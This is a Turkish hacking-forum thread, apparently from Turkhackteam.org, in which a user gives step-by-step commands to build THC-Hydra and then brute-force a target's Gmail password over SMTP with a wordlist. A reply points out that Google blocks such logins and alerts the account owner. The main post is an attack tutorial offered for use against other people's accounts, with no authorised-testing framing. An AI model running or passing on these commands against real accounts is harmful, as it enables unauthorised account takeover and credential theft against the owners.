THC-HYDRA Tool’u Nedir ? Nasıl Kullanılır ?

CyberOx

Üye
8 Ara 2018
90
1
[ame]https://www.youtube.com/watch?v=aPDVgXDFCc0[/ame]

Hemen hemen her uzaktan doğrulama hizmetini kırmak için kaba kuvvet saldırısı yapılıyor yada kullanılıyor.Hydra Toolu bize FTP,HTTPS,TelNet vb. dahil olmak üzere 50’den fazla protokol için hızlı kaba kuvvet saldırısı imkanını destekliyor ayrıca Kablosuz ağlara , gmail vb sistemlere kaba kuvvet yolu ile sızma imkanıda tanıyor o zaman kurulumuna geçelim.

NASIL KURULUR ?
İlk olarak kurulum yaptığımda şu tarz bir hata ile karşılaşmıştım siz karşılaşmayın diye küçük bir araştırma sonucu çözümü buldum ilk olarak libssl kurmamız lazım hadi konumuza geçelim

sudo apt-get install libssl-dev libssh-dev
kurulumu başlattık bittikten sonra scriptimizi indirelim

git clone https://github.com/vanhauser-thc/thc-hydra
İndirme bitti thc-hydra dizinine geçiş yaparak kurulumu başlatalım

cd thc-hydra
Dizine geçiş yaptık şimdi kuruluma geçelim

./configure
Kurulum Bitmedi daha sonra ;

make
bu işlemden sonra bir adım daha mevcut;

sudo make install
Kurulum bitmiştir nasıl kullanılır şimdi birde ona bakalım :}

NASIL KULLANILIR
Ben gmail üzerinden örnek vereceğim hemen komutumuzu yazalım

hydra -S -l hedef_eposta@saglayici(gmail,hotmail vb.).com -P wordlistiniz.txt -V -s smtp.saglayici.com smtp
Biz gmail üzerinden örnek vereceğimiz için kodumuz

hydra -S -l [email protected] -P sifre.txt -V -s 465 smtp.gmail.com smtp
Komut bu kadar enter tuşuna bastığınızda saldırı başlar doğru şifreyi ekrana yeşil renkte yazdırır okuduğunuz için teşekkürler.

Moderatör tarafında düzenlendi:

eClay

Yeni üye
23 Eyl 2016
2
0
Aa şey wordlistinde doğru şifre olsa bile gmail sürekli şifre denenmesinden sonra mail sahibine şöyle bir uyarı maili atıyor "Oturum açma girişimi engellendi
Birisi az önce Google dışındaki bir uygulamadan hesabınızda oturum açmaya çalışırken şifrenizi kullandı. Google bu girişimi engelledi, ancak ne olduğunu kontrol etmelisiniz. Başka kimsenin erişimi olmadığından emin olmak için hesap etkinliğinizi inceleyin." yani giriş yapmana izin vermediği için program doğru şifreyi girse bile saptırıyor ve program o şifrenin yanlış olduğuna karar verip başka şifreler ile tekrar denemeye devam ediyor.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.